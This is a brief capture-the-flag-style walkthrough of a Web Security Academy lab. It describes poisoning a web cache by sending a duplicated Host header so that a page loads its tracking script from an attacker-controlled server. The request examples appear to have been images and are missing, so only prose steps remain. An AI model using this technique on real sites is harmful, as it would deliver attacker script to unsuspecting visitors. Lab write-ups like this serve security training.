Web cache poisoning via ambiguous requests

Exploitation

We fire up Burp Suite, set up our proxy, then explore the site for a bit in order to collect some info. The request to the main page looks like this:

We notice in the response that it’s loading a JavaScript resource from https://0a4f008b04b8bab18151b12b0006000a.h1-web-security-academy.net/resoures/js/tracking.js

Let’s try to edit the Host header in our request. We’ll see if the response reflects our change :

Unfortunately, this doesn’t work out as expected. We get back a 504 HTTP error. Now let’s try creating an ambiguous request by duplicating the Host header in our request. Here’s what it looks like:

Now that we’re able to trick the target into loading a resource from an arbitrary server, let’s craft a quick HTTP endpoint on a server we control.

Now, we can send request multiple times, and test it works or not:

and we solved the challenge

hope you found this walkthrough easy to understand and follow

Greeting From Sayonara